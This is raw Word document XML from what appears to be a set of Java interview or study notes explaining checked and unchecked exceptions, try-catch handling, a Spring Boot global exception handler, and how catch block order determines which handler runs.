    <w:p w14:paraId="61EA3332" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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leReader reader = new FileReader("file.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BAF913" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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FF24E07" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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This </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>must be handled</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or compiler will show an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA853C3" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009E31C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6DC9B93">
          <v:rect id="_x0000_i1618" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA224EC" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31C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Unchecked Exception – Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F5DB5" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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void divide(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AB8C7" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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a / b); // Might throw ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F83D6" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31C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7B15E8B" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don’t need to handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> this. It’s the programmer’s responsibility to prevent such logic issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A84BE02" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009E31C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8492825">
          <v:rect id="_x0000_i1619" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A1F75" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31C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en to Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15157EFC" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>checked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for scenarios </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out of your control</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (file, network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B534DA" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unchecked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logic errors or illegal arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A44BA" w14:textId="346E60AD" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="1DBE9BDE">
          <v:rect id="_x0000_i1620" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D171599" w14:textId="77777777" w:rsidR="002D6AFA" w:rsidRPr="00CE4B95" w:rsidRDefault="002D6AFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="204" w:name="_Toc196307684"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle unchecked exceptions?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w14:paraId="0FC3470B" w14:textId="29592ADC" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">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Even though </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unchecked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., RuntimeException and its subclasses) are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not mandatory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle, you </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>still can and should handle them</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure your application is robust and doesn’t crash unexpectedly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5189188F" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00775AD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6164630">
          <v:rect id="_x0000_i1621" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="137FFC32" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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at Are Unchecked Exceptions?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAC043" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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se occur due to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>programming mistakes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AEA9B9" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B200D0" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD606E7" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rayIndexOutOfBoundsException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD38F80" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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llegalArgumentException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B351B8F" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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y are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not checked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at compile-time, but at </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F12BF" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00775AD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F8F58E8">
          <v:rect id="_x0000_i1622" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="032EDC0B" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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How to Handle Unchecked Exceptions?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC3D61" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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1. Using try-catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8B9299" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4483D8B0" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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111CC15D" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732D611" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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result = 10 / 0; // This will throw ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144B1661" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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tch (ArithmeticException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA656AA" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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aught exception: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B577FEA" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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6D30AC6" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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95134CF" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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B63ABCF" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00775AD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952A255">
          <v:rect id="_x0000_i1623" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C31066" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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2. Using a Global Exception Handler (Spring Boot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B58D79E" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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real-time apps (like Spring Boot), use @ControllerAdvice and @ExceptionHandler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54BBF0" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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trollerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBAC3A0" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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GlobalExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF9802" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A7581F" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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xceptionHandler(NullPointerException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EC7D78" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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ResponseEntity&lt;String&gt; handleNPE(NullPointerException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25964720" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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new ResponseEntity&lt;&gt;("Null value found: " + ex.getMessage(), HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11336AFF" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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C9C8057" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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AF4834B" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00775AD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22A8001">
          <v:rect id="_x0000_i1624" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="315D8720" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775AD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Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1596E9" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92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on't overuse try-catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – only where you can recover or log meaningfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B6301" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92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alidate inputs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid unchecked exceptions in the first place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E21E8AA" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="928"/>
        </w:numPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logging frameworks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to capture exceptions for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F820F" w14:textId="15E7A043" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2CC17D10">
          <v:rect id="_x0000_i1625" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9BD8A" w14:textId="77777777" w:rsidR="009A06ED" w:rsidRPr="00CE4B95" w:rsidRDefault="009A06ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="_Toc196307685"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What will happen if I use Exception and custom exceptions together? Priority?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w14:paraId="7D73CB96" w14:textId="61C7ED8D" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B65">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you have a catch(Exception e) block and also specific catch blocks for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom exceptions</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the order matters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E562AB5" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006D1B6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1F59453E">
          <v:rect id="_x0000_i1626" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB14D47" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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Java checks catch blocks top-down, and the first matching catch block gets executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE695E" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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o, priority is given to the first matching type, NOT the most specific by default.</w:t>
      </w:r>
    </w:p>
